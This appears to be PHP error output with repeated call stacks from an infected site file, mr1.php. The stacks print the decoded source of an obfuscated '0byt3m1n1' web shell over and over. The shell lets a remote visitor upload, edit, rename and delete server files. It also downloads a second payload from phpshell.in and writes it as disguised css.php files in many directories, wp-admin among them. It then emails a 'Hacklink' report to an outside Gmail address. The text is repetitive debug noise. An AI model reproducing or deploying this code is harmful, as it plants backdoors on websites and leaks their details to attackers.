';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.1567540296fclose ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:117 not exitsdone .
( ! ) Warning: fopen(C:/wamp64/www/sites/css.php): failed to open stream: No such file or directory in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 125
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0016521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.1653540296fopen ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:125
( ! ) Warning: fwrite() expects parameter 1 to be resource, bool given in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 126
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0016521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.1701540296fwrite ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:126
( ! ) Warning: fclose() expects parameter 1 to be resource, bool given in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 127
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0016521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.1732540296fclose ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:127 not exitsdone .
( ! ) Warning: fopen(C:/wamp64/www/css/css.php): failed to open stream: No such file or directory in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 135
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0016521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
